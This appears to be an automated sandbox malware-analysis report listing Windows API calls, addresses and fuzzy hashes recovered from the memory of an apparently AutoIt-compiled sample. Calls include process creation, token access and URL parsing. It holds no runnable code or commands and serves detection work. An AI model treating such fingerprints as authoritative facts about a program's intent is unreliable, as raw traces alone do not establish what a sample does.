                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00938BA4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3850602802-0
                                                                                                                • Opcode ID: 36c6148280e80efacf2706a1658d5426f5415a947fd116f9812f78e20b0cc02f
                                                                                                                • Instruction ID: 4271a0a4816360f3be68817717a5d0c103eb445324e9ee332a2b985cdd9bde6a
                                                                                                                • Opcode Fuzzy Hash: 36c6148280e80efacf2706a1658d5426f5415a947fd116f9812f78e20b0cc02f
                                                                                                                • Instruction Fuzzy Hash: D2110A79901219BFDB11DB95C885FAEFBB8EB48710F2040A5E900B7250DA716E11DB94
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E2612: GetWindowLongW.USER32(?,000000EB), ref: 008E2623
                                                                                                                • DefDlgProcW.USER32(?,00000020,?), ref: 008E12D8
                                                                                                                • GetClientRect.USER32(?,?), ref: 0091B5FB
                                                                                                                • GetCursorPos.USER32(?), ref: 0091B605
                                                                                                                • ScreenToClient.USER32(?,?), ref: 0091B610
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 4127811313-0
                                                                                                                • Opcode ID: 3649d427190842fad5f73aa572d5647768fb26e2939e9fd7949e12e459f63934
                                                                                                                • Instruction ID: 16d90c77d08caf687fd147a823edadaf262e8493b42f3865c15a9f7609c92e14
                                                                                                                • Opcode Fuzzy Hash: 3649d427190842fad5f73aa572d5647768fb26e2939e9fd7949e12e459f63934
                                                                                                                • Instruction Fuzzy Hash: 5F111335A10159BFCF10EFA9D8899BE77B8FB06300F40045AFA12E7250C770AA519BA6
                                                                                                                APIs
                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0093FCED,?,00940D40,?,00008000), ref: 0094115F
                                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0093FCED,?,00940D40,?,00008000), ref: 00941184
                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0093FCED,?,00940D40,?,00008000), ref: 0094118E
                                                                                                                • Sleep.KERNEL32(?,?,?,?,?,?,?,0093FCED,?,00940D40,?,00008000), ref: 009411C1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CounterPerformanceQuerySleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 2875609808-0
                                                                                                                • Opcode ID: 4eca202532c0c3a2030ddc3b208f3aaa7dd67c2143cedbe6395873a2f9822fb8
                                                                                                                • Instruction ID: 3fe20ccc069d595b273b66a19dc64da818982da73b1b02a9b8074cf52b96a4b4
                                                                                                                • Opcode Fuzzy Hash: 4eca202532c0c3a2030ddc3b208f3aaa7dd67c2143cedbe6395873a2f9822fb8
                                                                                                                • Instruction Fuzzy Hash: A3113C31D0851DDBCF009FA5E898BEEBB78FF0E751F01445AEA45B2240DB709590DB95
                                                                                                                APIs
                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0093D84D
                                                                                                                • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0093D864
                                                                                                                • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0093D879
                                                                                                                • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0093D897
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                                • String ID:
                                                                                                                • API String ID: 1352324309-0
                                                                                                                • Opcode ID: e666e2747c9966e7d10b72e33f598d5d33714a629be357aa02e196cd50b7d8b6
                                                                                                                • Instruction ID: da1e42c019082e8ddfead541fefc20d3c81dc16038e0bc4376c40855aa4f7911
                                                                                                                • Opcode Fuzzy Hash: e666e2747c9966e7d10b72e33f598d5d33714a629be357aa02e196cd50b7d8b6
                                                                                                                • Instruction Fuzzy Hash: 44113C75A0A304DBE3208F51FC58F92BBACEB00B00F10896DA516D7450D7B4F949AFA1
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                • String ID:
                                                                                                                • API String ID: 3016257755-0
                                                                                                                • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                • Instruction ID: 67093834b3d287d3b4871e679bde19617b4b88a02104a491044d2e4c79cda2e0
                                                                                                                • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                • Instruction Fuzzy Hash: AE01693264824EBBCF125EC4CC018EE7F76BB1C390B488415FA1858030D236CAB1AB91
                                                                                                                APIs
                                                                                                                • GetWindowRect.USER32(?,?), ref: 0096B2E4
                                                                                                                • ScreenToClient.USER32(?,?), ref: 0096B2FC
                                                                                                                • ScreenToClient.USER32(?,?), ref: 0096B320
                                                                                                                • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0096B33B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 357397906-0
                                                                                                                • Opcode ID: bb4beb7836909f1484fa0e6842976f795616ba0ebda7d69d212f8e9e72684ec1
                                                                                                                • Instruction ID: ff743c3e07d6aabdb6b20eea9f36d6055161e32889302b0fa561b2a07f21bcbb
                                                                                                                • Opcode Fuzzy Hash: bb4beb7836909f1484fa0e6842976f795616ba0ebda7d69d212f8e9e72684ec1
                                                                                                                • Instruction Fuzzy Hash: F61143B9D1420DEFDB41CFA9D8849EEBBB9FB08310F108166E914E3220D775AA659F50
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 0096B644
                                                                                                                • _memset.LIBCMT ref: 0096B653
                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,009A6F20,009A6F64), ref: 0096B682
                                                                                                                • CloseHandle.KERNEL32 ref: 0096B694
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memset$CloseCreateHandleProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 3277943733-0
                                                                                                                • Opcode ID: fce20891861f5176f2f65a158f8196675e2ccb5c91799660a5d921667cf52047
                                                                                                                • Instruction ID: 0a3e5d350d29e07e5f7593619ec039e700ab3a04f4ba4571cd0dd163ef39a506
                                                                                                                • Opcode Fuzzy Hash: fce20891861f5176f2f65a158f8196675e2ccb5c91799660a5d921667cf52047
                                                                                                                • Instruction Fuzzy Hash: 24F05EB2554300BEE7102761BC0AFBB3A9CEB0A395F044020FA08E91D2E7B14C0097E8
                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 00946BE6
                                                                                                                  • Part of subcall function 009476C4: _memset.LIBCMT ref: 009476F9
                                                                                                                • _memmove.LIBCMT ref: 00946C09
                                                                                                                • _memset.LIBCMT ref: 00946C16
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00946C26
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 48991266-0
                                                                                                                • Opcode ID: f114ce60dc2005ed21560b4c29b73b3d938a2df4aaeed98d8350743bfaed8a08
                                                                                                                • Instruction ID: 7a384d9c10fcb460f7802e09d10abcb2205c840196edb1aa61a6f38c9c6012c9
                                                                                                                • Opcode Fuzzy Hash: f114ce60dc2005ed21560b4c29b73b3d938a2df4aaeed98d8350743bfaed8a08
                                                                                                                • Instruction Fuzzy Hash: BFF05E3A204100AFCF016F95EC95F8ABB2AEF85320F048065FE086E267C771E811DBB4
                                                                                                                APIs
                                                                                                                • GetSysColor.USER32(00000008), ref: 008E2231
                                                                                                                • SetTextColor.GDI32(?,000000FF), ref: 008E223B
                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 008E2250
                                                                                                                • GetStockObject.GDI32(00000005), ref: 008E2258
                                                                                                                • GetWindowDC.USER32(?,00000000), ref: 0091BE83
                                                                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 0091BE90
                                                                                                                • GetPixel.GDI32(00000000,?,00000000), ref: 0091BEA9
                                                                                                                • GetPixel.GDI32(00000000,00000000,?), ref: 0091BEC2
                                                                                                                • GetPixel.GDI32(00000000,?,?), ref: 0091BEE2
                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 0091BEED
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1946975507-0
                                                                                                                • Opcode ID: b581a31f110d580facbd93b97e89228363ede990d5299a4119cff6d6f9f7d317
                                                                                                                • Instruction ID: 3bc29e7119081b640cbf65d566abf34f76bc2a0cb534d01ee584dcbaf642b22d
                                                                                                                • Opcode Fuzzy Hash: b581a31f110d580facbd93b97e89228363ede990d5299a4119cff6d6f9f7d317
                                                                                                                • Instruction Fuzzy Hash: 80E06D3261C244EBDF215F64FC1D7E83F15EB06336F00836AFA69880E187B14980EB12
                                                                                                                APIs
                                                                                                                • GetCurrentThread.KERNEL32 ref: 0093871B
                                                                                                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,009382E6), ref: 00938722
                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,009382E6), ref: 0093872F
                                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,009382E6), ref: 00938736
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentOpenProcessThreadToken
                                                                                                                • String ID:
                                                                                                                • API String ID: 3974789173-0
                                                                                                                • Opcode ID: aa3b3d487a9b111d34be745ac3c5183076c3d9d14b0044964eff49f394e0027e
                                                                                                                • Instruction ID: 5185ded403e1038cdc2d6dd60328f1174e1491704eb2b94dea852e8c4e49a026
                                                                                                                • Opcode Fuzzy Hash: aa3b3d487a9b111d34be745ac3c5183076c3d9d14b0044964eff49f394e0027e
                                                                                                                • Instruction Fuzzy Hash: 00E08637629312ABD7205FB07D1CB5B3BACEF507D1F14482CF246DA040DA748445DB50
                                                                                                                APIs
                                                                                                                • __getptd_noexit.LIBCMT ref: 00905DAD
                                                                                                                  • Part of subcall function 009099C4: GetLastError.KERNEL32(00000000,00900DD3,00908B2D,009057A3,?,?,00900DD3,?), ref: 009099C6
                                                                                                                  • Part of subcall function 009099C4: __calloc_crt.LIBCMT ref: 009099E7
                                                                                                                  • Part of subcall function 009099C4: __initptd.LIBCMT ref: 00909A09
                                                                                                                  • Part of subcall function 009099C4: GetCurrentThreadId.KERNEL32 ref: 00909A10
                                                                                                                  • Part of subcall function 009099C4: SetLastError.KERNEL32(00000000,00900DD3,?), ref: 00909A28
                                                                                                                • CloseHandle.KERNEL32(?,?,00905D8C), ref: 00905DC1
                                                                                                                • __freeptd.LIBCMT ref: 00905DC8
                                                                                                                • ExitThread.KERNEL32 ref: 00905DD0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastThread$CloseCurrentExitHandle__calloc_crt__freeptd__getptd_noexit__initptd
                                                                                                                • String ID:
                                                                                                                • API String ID: 4169687693-0
                                                                                                                • Opcode ID: 37421898b5c62199d314ace89b45769ce952f7eaebdc7eb3006e20c3e2f7d2e5
                                                                                                                • Instruction ID: 8b1d239d5ae3001df5671bdc3a1e19d8f9acc459657bb2d8d457dc83286eab4e
                                                                                                                • Opcode Fuzzy Hash: 37421898b5c62199d314ace89b45769ce952f7eaebdc7eb3006e20c3e2f7d2e5
                                                                                                                • Instruction Fuzzy Hash: 2ED0A931002F228FC2322730AC1EB2A7B58AF00BA1F05822DF0B6452F19B6098028E82
                                                                                                                APIs
                                                                                                                • OleSetContainedObject.OLE32(?,00000001), ref: 0093B4BE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ContainedObject
                                                                                                                • String ID: AutoIt3GUI$Container
                                                                                                                • API String ID: 3565006973-3941886329
                                                                                                                • Opcode ID: c497705f053769cedaf7ada2a40068aaa98442a8c4b58240a7e78d6c823df792
                                                                                                                • Instruction ID: d5b7b738b1d13bffe2a86bae1e655d694192803a7dfa3b8f344da407ae466f1a
                                                                                                                • Opcode Fuzzy Hash: c497705f053769cedaf7ada2a40068aaa98442a8c4b58240a7e78d6c823df792
                                                                                                                • Instruction Fuzzy Hash: 2C910871600601AFDB14DF68C884B6AB7E9FF49710F24856DFA4ACB6A1DB71E841CF50
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008FFC86: _wcscpy.LIBCMT ref: 008FFCA9
                                                                                                                  • Part of subcall function 008E9837: __itow.LIBCMT ref: 008E9862
                                                                                                                  • Part of subcall function 008E9837: __swprintf.LIBCMT ref: 008E98AC
                                                                                                                • __wcsnicmp.LIBCMT ref: 0094B02D
                                                                                                                • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0094B0F6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                • String ID: LPT
                                                                                                                • API String ID: 3222508074-1350329615
                                                                                                                • Opcode ID: c7a30297d3f27fc0958531c131e73e41f0b500bc7a28e62bc68a62f674881668
                                                                                                                • Instruction ID: 45d4c4f0a59f7bfc3f7ce8fa8938136ef3ab13f6d52dabda6eee394ef23ea4d8
                                                                                                                • Opcode Fuzzy Hash: c7a30297d3f27fc0958531c131e73e41f0b500bc7a28e62bc68a62f674881668
                                                                                                                • Instruction Fuzzy Hash: 6A618175A04219AFCB14DF98C891EAEB7B8FF49310F104069F95AAB2A1D774EE40CB51
                                                                                                                APIs
                                                                                                                • Sleep.KERNEL32(00000000), ref: 008F2968
                                                                                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 008F2981
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: GlobalMemorySleepStatus
                                                                                                                • String ID: @
                                                                                                                • API String ID: 2783356886-2766056989
                                                                                                                • Opcode ID: a78e990147d51fad28318f2287603fbf6c87fb8b60b103b5b6141c83e9662c27
                                                                                                                • Instruction ID: 0aa87815fa08aa3a984c3531f5166ae885499df5b09f9fa9fc4daaf1d1775b41
                                                                                                                • Opcode Fuzzy Hash: a78e990147d51fad28318f2287603fbf6c87fb8b60b103b5b6141c83e9662c27
                                                                                                                • Instruction Fuzzy Hash: 5E515971418785ABD320EF15D886BAFBBE8FF86340F42485DF2D8811A1DB718528CB67
APIs
  • Part of subcall function 008E4F0B: __fread_nolock.LIBCMT ref: 008E4F29
• _wcscmp.LIBCMT ref: 00949824
• _wcscmp.LIBCMT ref: 00949837
Strings
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: _wcscmp$__fread_nolock
• String ID: FILE
• API String ID: 4029003684-3121273764
• Opcode ID: 0e25ba76f870de6c0daa1fc75fcdcf0d4ae11439c2fd859a6e98ad248894d083
• Instruction ID: a15b6ce906eaf9881ad54309a4fd0192cff78dab3b32ce4a5c626e382ed2649e
• Opcode Fuzzy Hash: 0e25ba76f870de6c0daa1fc75fcdcf0d4ae11439c2fd859a6e98ad248894d083
• Instruction Fuzzy Hash: 5641D771A0420ABADF209BA9CC45FEFBBBDEF86714F000469F904E7181DA719A048B61
APIs
• _memset.LIBCMT ref: 0095259E
• InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 009525D4
Strings
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: CrackInternet_memset
• String ID: |
• API String ID: 1413715105-2343686810
• Opcode ID: ea3929885294bc9d504e2d081b7b87d82cf85c92ee696ccb2e7e9b9f3a4810f1
• Instruction ID: bc305aa1bbc15484f643fc53cea3b793ca1bc6ac4a95162af3bced6c1018d1a5
• Opcode Fuzzy Hash: ea3929885294bc9d504e2d081b7b87d82cf85c92ee696ccb2e7e9b9f3a4810f1
• Instruction Fuzzy Hash: C2311471801159ABCF01EFA6CC85EEEBFB8FF09310F10006AFD14A6162EA315956DB61
APIs
• SendMessageW.USER32(?,00001132,00000000,?), ref: 00967B61
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00967B76
Strings
Memory Dump Source
